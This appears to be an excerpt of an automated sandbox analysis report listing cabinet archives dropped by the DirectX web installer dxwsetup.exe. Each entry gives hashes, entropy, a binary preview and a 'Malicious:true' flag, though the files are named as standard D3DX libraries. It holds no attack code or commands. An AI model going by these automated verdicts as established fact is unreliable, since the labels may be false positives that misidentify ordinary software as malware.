                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.

                                                                                              C:\Windows\msdownld.tmp\AS6C59BB.tmp\Apr2005_d3dx9_25_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073002 bytes, 5 files, at 0x44 +A "d3dx9_25_x86.cat" +A "d3dx9_25.dll", flags 0x4, ID 6922, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082170
                                                                                              Entropy (8bit):7.999075135168916
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:i0BodqhH/OCy8M+j5lcB4ZfeXBXUd/QLML9bw6Uzc12:iUbffy/+lmBXF8Ioxw6Uo12
                                                                                              MD5:9C5DCA423D9D68349D290DF291DDBEEF
                                                                                              SHA1:D9F1CAE586470EA309CE9F115525B0504FFFAEA4
                                                                                              SHA-256:5487ED4E969A822E5C481CEFB1D4DA3066B1D5EC8C55798B246915ECB58A8665
                                                                                              SHA-512:9F50599321F45FB7451B0A1C0F1DCBD6B4A4E60EE27B0EF5AA29168C1BCE5B08F34329916EA2EA655CD632D0A19C81953C2A5F1277F6A96FB63AFC098236509D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....j_......D...........................j_...#..............H...7.........r2. .d3dx9_25_x86.cat..#.7.....r2}. .d3dx9_25.dll.......#...r2,. .apr2005_d3dx9_25_x86.inf.......#...r2,. .d3dx9_25_w9x.inf.....k.#...r2,. .d3dx9_25_x86.inf.(.0.?..CK..\....'4.A..".+.@.%..C*.4).b!@..$.....a..k.#..v.w.w.]xg...............9{......k....q....6.Z&Ey-.@.....a.0.T...9b......a...b....ilk.+c.5.af.o.vl..............<....s.z..V.7........fa\.G\$En..._..|$.?9.O...!..H.<...#.,...!.^N.<.g"..=.V|O.a..gwcw...t.c.......X..4(.).. .?.S..0k..._2{<%X.......m.*....D&&..v.c ....Av...u.l. K2......R.0.&.XO8b..p."H@^..2..jbb...hg.&...>.>....u..x....2...@.~....9..u.a.M.X...S5d_..|}z"h..1.....<...Z!...V).............}OO...n.2..Q....../.......R+[C..l..(...@......1........$..vs..K. m...e...b..\}u.+.....?..bg...P.......%.pRgTq.t.t.e<..t.Y._.X.?F.(../.......abb.G5.qkb.\..Z...g.....g..(.....f..Lz.8...h.e....t.R.fJ.iJNCv}:.V.:..m.B..JIQrlA..Z5..HR..)9-...:.......V.JP.)t*.....6m....

                                                                                              C:\Windows\msdownld.tmp\AS6C639E.tmp\Jun2005_d3dx9_26_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....(......D............................(...#..............G...7..........2b} .d3dx9_26_x86.cat...#.7......2Z| .d3dx9_26.dll......,#....2.} .d3dx9_26_w9x.inf......-#....2.} .d3dx9_26_x86.inf......0#....2.} .jun2005_d3dx9_26_x86.inf...N..>..CK..X....'.. ..P.....&!. .%.A........`.....;v..WTd..........w......{.{..<'...3..;}....=Xv3.e.vc:.yg.i.....1.....V.F.:.fMj ,.|.e.....F..5#?.|6.M.j[Z..k3.....g.f.B(..=v......a<.7..a.=.:...h.f.X6.."..I..I......Od:.!9......~1.H..q.....'....y..\...E..u.S|K.a...:c..B..8g:!?._..E:.A.H...N.a..j..~pI.....V.k.l.W.....X..........`4.2(.....e.>...0...!L..>p.....2d..r<...afffPK.6..t0.V.'HA.....j.o...5B+. .....hy...... M..5t...K.<>..@.G........~h..Xw.B.....F~>.?l..7..].}Xp.m.!......x~6.aY_*.rmH..sr.."Q*..]..d3.{.bXX`P....io...AZ.i..$..1....Gl.....d..AM:6.......p./(..Q.1..1..q....O.c~.c........04...|s3...}..x..I.r..).m.K1.o#.Q.Fa...X7.baY......G{......Z5S.HU..c.tp.z6.4m.B=P...d.6...g.....W..aM...z...L.R.W%...z.F.n.5....54EG.R

                                                                                              C:\Windows\msdownld.tmp\AS6C6D43.tmp\Aug2005_d3dx9_27_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1071684 bytes, 5 files, at 0x44 +A "d3dx9_27_x86.cat" +A "d3dx9_27.dll", flags 0x4, ID 6926, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1080852
                                                                                              Entropy (8bit):7.999138982152864
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:sP2N00PXWcq4UsDMMlsOgDUaQFMBZ0To2xIG:sP2CuZQsVl96fQiZMo2xz
                                                                                              MD5:3E91448A7481A78318DCE123790EE31A
                                                                                              SHA1:AE5FE894790624BAD3E59234577E5CB009196FDF
                                                                                              SHA-256:8C062B22DC2814D4F426827B4BF8CFD95989FD986FB3AAA23438A485EE748D6D
                                                                                              SHA-512:F8318BD7CA4271FC328D19428E4688DA898B6D7FB56CC185AD661D4A18C8169392C63515D7DD2D0B65CBD1F23892D7A0A5D3D77A4CDA6230BA03B3B917E5C39A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....DZ......D...........................DZ...#..............H...<..........2.. .d3dx9_27_x86.cat..d#.<......2b. .d3dx9_27.dll.......#....2.. .aug2005_d3dx9_27_x86.inf.......#....2.. .d3dx9_27_w9x.inf.....p.#....2.. .d3dx9_27_x86.inf.]Z...>..CK..X.[...C.)...1(v.).. 3."J.P.. @(.&.Y..v...].....{.cW.$("..w.....yN<?v.5k.......q.Y..0......Z&.9N.!.....f.0.X...9b......fF......iL..+c...ff.tx.f....no.II...2.LO6..arY...u*..PZM..9.6f..H.<...._..G".K.1...R.I..|......=!....\O}<[/E.#..>.......+...........v!..C..:..Q.$.....s....LD.Q.i....h....b*..aB3c.a.b.W..c.151/,./r.rD>...(.i..%!.......\.......Sn.|t.[{F..Mq..\..5.d......J....J.3&....jN../S_N...Qg...gA..3..:...T.0f7.k..&.a.{o.+.j....:..j.f.s..54..`.}..g......?h....bf...w.(......C)(...$.........gJ~..`.;..P>...e.......c.C..@K...d0.@M0(.YM$.y..78..U.Y...J........W......A.04)...&4..{?....Ce..W.;..0m..x.9......n....Io!.!.>...o.......],OQ..0.Q..[KR5QrU.2)I...m.kU."<^..S..3.Q.....".b.F..UF.uJ....:lZ...p.2.R.

                                                                                              C:\Windows\msdownld.tmp\AS6C75FD.tmp\Dec2005_d3dx9_28_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~

                                                                                              C:\Windows\msdownld.tmp\AS6C7F92.tmp\Feb2006_d3dx9_29_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1078760 bytes, 5 files, at 0x44 +A "d3dx9_29_x86.cat" +A "d3dx9_29.dll", flags 0x4, ID 6921, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1087928
                                                                                              Entropy (8bit):7.99922866964108
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWlF24ngnZPhX4ciAwvVHgK6SgHY6OmSfLV+:MWls4gnZTmHx6SgnPCY
                                                                                              MD5:F6CC1C08D0F569B5F59108D39CE3508B
                                                                                              SHA1:E9CF7EDC8C9C4B57A9BADD8386A2117EC5785AAB
                                                                                              SHA-256:4114E76799AF3DA9DB3DAE51305DAD70A05B757E506E4A327092D536CCA7EE75
                                                                                              SHA-512:86DF72D5B15396ACB504C1AC9DE7FF5C0CC9C95A90FDD82DAEDC55BAAD490CC47A71CB511571D37E25DD9BC1EE9652B9723E33879BC1756A7881A8E61EBC59ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....u......D............................u...#..............H.............C4.F .d3dx9_29_x86.cat..#.......C4hE .d3dx9_29.dll......#...C4hF .d3dx9_29_w9x.inf.....x.#...C4hF .d3dx9_29_x86.inf.......#...C4iF .feb2006_d3dx9_29_x86.inf.w.6..>..CK..X.[...C.Q...1XQ.N..........T,..D .$....c.]......#..{.z..]..E....}...?......f.=..=.g.....v..]F.Y3j...8...&....V..S=S.f...1]aQ......a...1..Q...V.....m..e........s..m.[c.....yl.{/.^%q.Z.I ..hg..DH..........$..........AB.....!N.w=!F.g. .s.p.B...X...LL..X.c ....z.B...........b.81...>:/b..*.....511A..[.&.3vo.'.V)..kgjb...\..|..!(.i..%#...8..9U*m..]_.E...c.o.{....|j..r4..CN..2....K..].t.E..CH.2b}I.A_.D...5s.e....K..&..*.n.K....a..p.$29...o.HN..[..k...d......1V.....P..9..e.....p9...c=..RQ .7.H61.e ......I~.v.....p}:.1.:r.i....qb..@K.......AM.(.QM....%.p....+.9....~.J~.J~.J~.....-....`.0LLl...3nL.....t.f/...x.9......n....I/!.!V..X........S,OU..`.tt..u$i...*]...`.6...o..(..).-..tD.....L.B.S.+c.:.Z.n......od<..

                                                                                              C:\Windows\msdownld.tmp\AS6C883D.tmp\Apr2006_d3dx9_30_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1109261 bytes, 5 files, at 0x44 +A "d3dx9_30_x86.cat" +A "d3dx9_30.dll", flags 0x4, ID 6903, number 1, extra bytes 20 in head, 74 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1118429
                                                                                              Entropy (8bit):7.999050518080374
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:OreyPa6AC8e290lruGDhi3TSvHDh+ISNvRNhPmJ0RRuu:cNoeYEuTSvjh+R3WKRv
                                                                                              MD5:B3D644A116C54AFDA42A61B0058BE112
                                                                                              SHA1:9AF7DDC29EEF98810A1A2F85DB0B19B2EC771437
                                                                                              SHA-256:CA7B9C6A49E986C350147F00A6C95C5B577847B5667B75681A1EE15E3A189106
                                                                                              SHA-512:A2D2F12B7B37BD8F5C8465DD13AD31942DF11EE5ED5423DEEEB178E6B594587706D2C5116258BE1562CAA5ECA691358AF3CB83B77898D1012FF521017D199165
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............J..............44f .d3dx9_30_x86.cat..p$........4.e .d3dx9_30.dll......$....4.e .apr2006_d3dx9_30_x86.inf.....z.$....4.e .d3dx9_30_w9x.inf.....+.$....4.e .d3dx9_30_x86.inf.v..[>..CK..X.K..=.. ....+..MBI.. M@.n..QH0....#....c..b/..{.z....E..y.......N8?gg..{..=..{...W..;..:....IA.....a.`.......43GX..r..,.f...+FA..,.....2..a0..2......Z.ty.Ih...m0w..es0Ww.[/.n%q.Z.I...ho......#...G.....\.. 1.P6....;.s.cZ.......t.B...X...LL..X.C.......B.......~......@..!..8..O..O..!mR..fbb.0.8L.f..XO.R.-......Y...y...Q4."5JD...p..s.T.f.2z.6..~...........9VPR.f.BH=.bg.s,.T.!=......O..........B...||}...X..5]R.0.....c.+.4..S....E.7.y...[....3...2$..:qt...7T......Q..@X..Ji...q.Z8.Ea(..@zS.D.3;.b..a.}L.;..PG/-....(...../vL_...@K....c..&....f..y.....3.8fW:.T:N7..W:..t.t...#(.FK.k..X..&...;_...Be.w.....b6.z<..za..}_7.afQ......O{,..Thu...).'+..0{:.V}kI.&Z.JU&&*...B..[.'..t.vK.9.`]..!.)Vht.8e.\.T.....i......I.

                                                                                              C:\Windows\msdownld.tmp\AS6C92CC.tmp\Oct2006_d3dx9_31_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1121257 bytes, 5 files, at 0x44 +A "d3dx9_31_x86.cat" +A "d3dx9_31.dll", flags 0x4, ID 6911, number 1, extra bytes 20 in head, 75 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1130449
                                                                                              Entropy (8bit):7.9990817245216945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fd5gyP75nbAgKdWsTLSCs3BZnH50ve35Jxroo6DS:F5fP75nbt0STRZn9nxrb5
                                                                                              MD5:F778928C9EB950EF493857F76A5811AD
                                                                                              SHA1:EA82D97077534751297AE0848FB1672E8F21E51E
                                                                                              SHA-256:4891E2DEA9D1798F6A89308E58C61A38E612F8433301EA2376AE14C3DFCB3021
                                                                                              SHA-512:1F382A287FC6763B8E8D66825E8256DFB7D0DEAD6B6A6B51DD7C4A5C86D536CC7EF4128BE0CE495FE17C859018750072DC7B43E3476D1BA435F209CC4EB6D43F
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............K.............<5m. .d3dx9_31_x86.cat...$.......<5.. .d3dx9_31.dll.......$...<5.. .d3dx9_31_w9x.inf.......$...<5.. .d3dx9_31_x86.inf.......$...<5.. .oct2006_d3dx9_31_x86.inf.j5o.s>..CK..\....oh"....Fl..'.......i.*vC..... `..w...6.....`.....;..E..........l.w.3....Y,..+......yg.a.....$.`0...6...XZ4.FX..J...l.V..o;F^..lH....3'.f0..G.m..P.[>...G..j..c^....p.<OAO.N.q.Z.E...hk..H...'@../.B.....q`K...y"..-9.r.'.9...x.O.R.8.......c....`Gc..C....>......X.......|0c..tz......./....-.faa.0..<,.V.^X..B......:/...y...3...X.GZ..T......Bi[.KY.x..A...3.[...s..l..J..U..h.../2Z"7......k....yB.E^.r....T........K.....,...X..)..C...z4.....b......o..yv5.!5...CD`&.\.<0..P.y9..e..`{m8..K.:(.....w..la..@.++.N... .y6.m.......,.c...[lc....d..AM.6........ .P...uD.........m...........m.e.`9t..+..aa..@5.y}r.\..rJ.={9f...3...fO4.u.V6u-z.....t.n..*.A..0%.T....L'.[K...Uh....Ul....vum.........N.U..).)Q...x.RaPk5..X3z.e...

                                                                                              C:\Windows\msdownld.tmp\AS6C9C42.tmp\Dec2006_d3dx9_32_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..

                                                                                              C:\Windows\msdownld.tmp\AS6CA606.tmp\Apr2007_d3dx9_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1600079 bytes, 5 files, at 0x44 +A "d3dx9_33_x86.cat" +A "d3dx9_33.dll", flags 0x4, ID 7180, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1609247
                                                                                              Entropy (8bit):7.999284261824255
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:4cQY0tIpwa5ydxGuruluTsRWo1Iq9e5m98yiN9/0rjVH60mPxr/1MQK:4cIIi+G9rul8uooec98yi//0rjoDZrCF
                                                                                              MD5:A5915EC0BE93D7EEBE8800CE761EE6DC
                                                                                              SHA1:E8BBC21C2B5F0E5801286F07E3DA09DBC67C3961
                                                                                              SHA-256:EFA2E6DE548401376A575E83A79DE019AA38F191D63FDEF3BD2B07D8CB33E3D7
                                                                                              SHA-512:02259FF3C8478CBA134A8F8408AA624B7165CED97C0AED8C9626034599DD5439F84D1AF9EEFC4191898B0A524E5FFAFB9875EC00E740CEBE97EAC4C2DD0E31AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Oj......D...........................Oj...#..............l....(.........6{. .d3dx9_33_x86.cat.hW5..(....l6O. .d3dx9_33.dll.\.....5....6B. .apr2007_d3dx9_33_x86.inf.....\.5....6B. .d3dx9_33_x86.inf.,...g.5....6B. .d3dx9_33_x86_xp.inf.6^]Z.;..CK.y<.....Y.[.J..".<3..K.AJ.CQa.&a..-.L.vE...")[e..!E)e...(q.W).g..t...?.....Ws^...|.9...9.=.3..L.XN.U.&... ...L.p.b ..,....$.BJp@0.....@#.x^D*...T.`~N./J~... ..A6..Tj.....s.....a...A.....#YV..`&B.m...!"....O.h.x.....!M ..e. k@...$C.7..F...7.%...............C".Xk..V..Y...*..9...B>.n......J..<......{..w.MORA....v...H..l%.....`...;l.:..T@'Y]..9,H.`.,....A.....u..p.a.....D./!..VZ..1P..I......C..........9..4..1.z......h....W...~.}"hK.m..sA..}<;..w...,8.[a.y.!X...HM....qf.!....i.~.m`.O5...T&......2?...,%#.YCTh......H....@.a........?....7..}.+.c.S.\...-.%`.......1...5......24..........5.....yy-v..R.......{.C*..@"....n..C.I.`.ZX....@.MH.*.+9Q[.|.rD.j ...A.(.Vb.ZZx.f......F..}h..X....~[.Cs.S|....RV9JT.k.....c....C...

                                                                                              C:\Windows\msdownld.tmp\AS6CB038.tmp\Apr2007_d3dx10_33_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............Y#..............#..............1....).........6{. .d3dx10_33_x86.cat.p%...)....l6O. .d3dcompiler_33.dll.h...2O....o6=. .d3dx10_33.dll............6E. .apr2007_d3dx10_33_x86.inf.I...7......6E. .d3dx10_33_x86.inf.i..........6E. .d3dx10_33_x86_xp.inf..j"(.2..CK.y<...........l.al..)e.!a.&...l3.-.h....j.,."D.R..O...%W).gFn........}.z5..<s..s>.s>..|...U*x...Z..!..E..U...<$.....y0.sPH)....<..<.4.M.@...U.......\).@..6.'.Yi.!.....R.@.&..X..i..z..Y....`...C...).Cz...p.9H$...t@....I.s....;.[.C+A"..<.7.w3..A..u...s8$....ma.Y5.3.e C.e.yAAP ...@L..8.,?..h.a..E2=..9=.......e5|a./3B"q....Zh.P...6P.."....k....:.w..:.h%.....H.0u......+..D.+!..-...9.sD...O...QZ.a..8v#......Q..N..l%....c..?P..........>.....~......0.F.VB!1ii..v5.4.R.R.....LX.X.........w.8.'.~..p.8.......A......6w.\...~..[.B.E.!..h....uQR..q.....O.....R......Cth-.....$z..B..00.l.Uo.. '..m..fB..}...ij....<..RX._......k .k1.xH......A3y.<~V>.s^gV.8+.;+...CP..+. &.....PH..).UA{...E..

                                                                                              C:\Windows\msdownld.tmp\AS6CB74C.tmp\Jun2007_d3dx9_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601326 bytes, 5 files, at 0x44 +A "d3dx9_34_x86.cat" +A "d3dx9_34.dll", flags 0x4, ID 7195, number 1, extra bytes 20 in head, 108 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610494
                                                                                              Entropy (8bit):7.999066428256981
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ZBdkB3TM+mIf4qyM0iJRy3QvQDxPYKhatPJZcg9QwJeYX34eq2F37kRVeLbdiL3q:ZPU3TMXxDVI3vQ2KSBP4YH4aAELbdK3q
                                                                                              MD5:FE8FEB215FAE59866DCD68C1604D97AA
                                                                                              SHA1:CEDACA678D15E78AA458B965ABB467E8964A1FAB
                                                                                              SHA-256:1C1E1C6F68BA556A0AF09A38C32EB421C543A4848C4B42D25867C98DAB3B3A50
                                                                                              SHA-512:9955336B561E4FD3BA3DA7FC086643E811048A25A7E68344D2CC5CAB091980BAAE1C04CE41328B59C896662E2875886B78EC869852B2D1DAAA46AF38C894A3F2
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....o......D............................o...#..............l....(.........6.. .d3dx9_34_x86.cat.h_5..(.....6.. .d3dx9_34.dll.......5....6.. .d3dx9_34_x86.inf.,.....5....6.. .d3dx9_34_x86_xp.inf.\...7.5....6.. .jun2007_d3dx9_34_x86.inf.A.".l>..CK..\...;T.D...1.(.`...2CH..........`.UD.....b.;va.;*6...w.{.f.l..9.....w?..=k....=.;..........Zh.....<m--.....^..:.z.#_g.~.>.Z.Z..C..|...5..J.P..JKK.(.0...>+.G..~.hy{c....b2.,..!..?E.&.j.1.u.=.1.B...q...p..>...q.Y....x..\6.uB......>........A..A.f.1..{v.Z...F.F.|:.[.Z!..@$.IA.H""ET.J.c.........d..G.....\...xco.#.G......`k?d..E..s...B,........O.0(?..r.......TD..y.W..FkkkC+i...&..!@... ..xP_>(#!...b.O.>,P.8d......lM>..R-t...[.lm2.WS|.u..._.K/.3.3.~.1a....+*....q....o.M.O>o..Y...O*/..B.y_...V..5..5..$#~.+.H..5.B.tu...../.......|.[.(5q.YT5...II..@K._.d0.@M (.U.p...J.!Q_....5.....O....?].k.)..3.u.an}*.....6A. .]].....rg....Z.0...}...u.....*P$g*eq.*.]t/......e.JE."VE.(...LhNu..(...L!g.0...:m:...V(T4~.*^...2...y

                                                                                              C:\Windows\msdownld.tmp\AS6CC1DB.tmp\Jun2007_d3dx10_34_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 692512 bytes, 6 files, at 0x44 +A "d3dx10_34_x86.cat" +A "d3dcompiler_34.dll", flags 0x4, ID 9065, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):701680
                                                                                              Entropy (8bit):7.9989902264021255
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SuBBWP1krfKO0BZwB6ux8hBXsRbD3RazqgwLdJPMqHy7qdXCyhUW3zE:DBTrZ0BZwV8fXsprRaxsDBHyWdXg5
                                                                                              MD5:19383CBADA5DF3662303271CC9882314
                                                                                              SHA1:123C97C33F7EF2BA345B220450F181D440412E6B
                                                                                              SHA-256:8EC971C91040618338AC2369188F3E5D7C85A5B1E3B9FC8E752DD845D295CDBA
                                                                                              SHA-512:A4C6ACC9FF656E05D75AE0081C65C200B584209C99FD001494C4D206F2CE8A78D2DD3644E51018574928F3B9E9373BF7EC8C5147A3590B54D1C6D50E61342853
                                                                                              Malicious:true
